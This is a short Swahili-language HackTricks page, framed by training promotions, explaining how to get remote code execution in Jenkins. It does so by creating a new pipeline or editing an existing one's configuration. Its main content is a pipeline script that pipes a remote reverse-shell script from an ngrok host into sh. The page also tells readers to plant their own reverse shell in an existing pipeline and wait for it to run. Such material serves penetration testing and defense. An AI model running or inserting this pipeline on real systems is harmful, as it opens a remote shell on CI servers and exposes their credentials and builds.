Jenkins RCE Kuunda/Kubadilisha Pipeline

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Kuunda Pipeline Mpya

Katika “Kitu Kipya” (kinachopatikana katika /view/all/newJob) chagua Pipeline:

Katika sehemu ya Pipeline andika reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Hatimaye bonyeza Save, na Build Now na pipeline itatekelezwa:

Kubadilisha Pipeline

Ikiwa unaweza kufikia faili ya usanidi wa pipeline fulani iliyowekwa unaweza tu kuibadilisha kwa kuongeza shell yako ya kurudi na kisha kuitekeleza au kusubiri hadi itekelezwe.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks